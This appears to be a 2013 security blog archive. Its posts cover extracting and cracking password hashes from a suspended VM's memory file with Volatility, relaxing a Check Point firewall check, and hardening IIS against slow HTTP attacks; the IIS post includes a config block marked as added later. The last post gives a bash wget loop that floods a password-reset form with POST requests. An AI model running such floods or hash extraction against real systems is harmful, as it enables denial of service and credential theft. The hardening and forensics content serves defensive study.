Sunday, February 17, 2013

Examining a Suspended Virtual Machine

I would like to show the danger of suspended virtual machines. With the tool called Volatility there are several things you can extract from a .vmem file; the available options can be found from the link below.
Within the example, we will find the local password for the related OS user.
To use hashdump, pass the virtual address of the SYSTEM hive as -y and the virtual address of the SAM hive as -s, like this:

Hashes can now be cracked using John the Ripper, rainbow tables, etc.
In this example the password I have used appeared within a few minutes.

Illegal post SYN packet

Symptoms: fw ctl zdebug shows drops like: _tcstate_update Reason: Illegal post SYN packet;

Any packet from the client other than SYN or RST is considered a security issue: the firewall thinks that the client is trying to send packets before the server has responded to the initial SYN request.
In order to allow such unexpected packets, enable the related kernel parameter on the Security Gateway.

Check the current value with:
# fw ctl get int fw_allow_out_of_state_post_syn

# fw ctl set int fw_allow_out_of_state_post_syn 1        activate on the fly
# fw ctl set int fw_allow_out_of_state_post_syn 0        deactivate on the fly

If it helps to resolve the issue, it's time to make it persistent across reboots.
Create the $FWDIR/boot/modules/fwkern.conf file if it doesn't exist. This file is not present by default.

[Expert@testfw]# cd $FWDIR/boot/modules/
[Expert@testfw]# pwd
[Expert@testfw]# vi fwkern.conf


Define the parameter there as a name=value line, giving the value in hex.

Wednesday, February 6, 2013

IIS Tuning Recommendations against Slow HTTP Attacks

If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service.
A single attacker can take down a victim web server with minimal bandwidth.

Request attributes are limited through the requestLimits element, specifically the maxAllowedContentLength, maxQueryString, and maxUrl attributes:

Maximum URL length: 2 KB, by specifying 2048.
Maximum query string length: 1 KB, by specifying 1024.
Deny access to unlisted HTTP verbs by clearing the "Allow unlisted verbs" check box.

Set headerLimits to configure the type and size of headers your web server will accept, for example:

Content-type: 100 bytes

Tune the connectionTimeout, headerWaitTimeout, and minBytesPerSecond attributes of the limits and webLimits elements to minimize the impact of slow HTTP attacks:

connectionTimeout: 30sec
headerWaitTimeout: 30sec
minBytesPerSecond: 250


Web Limits
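The settings above collected into IIS configuration, as an added example rather than a fragment from the original post. It assumes the requestFiltering part goes in the site's web.config and the limits/webLimits part in applicationHost.config; the maxAllowedContentLength value and the verb list (GET and POST only) are assumptions, since the post gives no values for them.

```xml
<!-- Site-level web.config: request filtering. Values are the post's,
     except maxAllowedContentLength and the verb list, which are assumed. -->
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <!-- maxUrl 2048 = 2 KB, maxQueryString 1024 = 1 KB -->
        <requestLimits maxAllowedContentLength="30000000"
                       maxUrl="2048"
                       maxQueryString="1024">
          <!-- Reject any request whose Content-type header exceeds 100 bytes -->
          <headerLimits>
            <add header="Content-type" sizeLimit="100" />
          </headerLimits>
        </requestLimits>
        <!-- "Allow unlisted verbs" cleared: only the listed verbs get through -->
        <verbs allowUnlisted="false">
          <add verb="GET" allowed="true" />
          <add verb="POST" allowed="true" />
        </verbs>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>

<!-- applicationHost.config (%windir%\System32\inetsrv\config): timeouts and
     minimum transfer rate, so slow or idle clients are dropped early. -->
<configuration>
  <system.applicationHost>
    <sites>
      <siteDefaults>
        <!-- connectionTimeout 30 s (default is 2 minutes) -->
        <limits connectionTimeout="00:00:30" />
      </siteDefaults>
    </sites>
    <!-- headerWaitTimeout 30 s: headers must fully arrive within 30 s;
         minBytesPerSecond 250: slower connections are closed by HTTP.sys -->
    <webLimits headerWaitTimeout="00:00:30" minBytesPerSecond="250" />
  </system.applicationHost>
</configuration>
```

Verify the effective settings with appcmd list config -section:system.webServer/security/requestFiltering and -section:system.applicationHost/webLimits.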

Saturday, January 12, 2013

Let's Do Some HTTP Post Flood

This tool allows you to edit and replicate HTTP parameters after the request finally leaves your browser.
It's for educational purposes only. The aim of this tool is to show wget usage.
It can be downloaded at

File name: HTTP Flooder v1.0. Usage:
It uses wget.exe located on the C:\ drive and creates an HTML file of the HTTP response in the directory where it runs.

Example usage: before running it, sniff the traffic with a local proxy like WebScarab and copy/paste the final request data to flood.

For Linux users,
an example of a simple bash script that will do 100 POST requests:

for i in {1..100}; do
wget --user-agent=Firefox/10 --referer= --post-data="__VIEWSTATE=%2FwEPDwULLTExMjU2MzY2MjcPZBYCAgMPZBYSAgMPDxYCHgRUZXh0BQxVc2VyIE5hbWUgOiBkZAIFDw8WBB8ABQR0ZXN0HgdFbmFibGVkaGRkAgcAPDxYCHgdWaXNpYmxlaGRkAgkPDxYCHwJoZGQCDQ8PFgIfAmdkZAIPDw8WB9B8ABQR0ZXN0HwJnZGQCEQ8PAFgIfAmdkZAITDw8WAh8CZ2RkAhUPDxYCHwJnZGRk8Nl1HK2Uc%2B9sUZwQEPNDjmgqRms%3D&__EVENTVALIDATION=%2FwEWBAK41KgrAuzRsusGAuzR9tkMArursYYIKiocz95qxVisTmMDLVdMhHxNkYk%3D&Email=test&Button=Send+Password" --no-check-certificate --no-dns-cache
done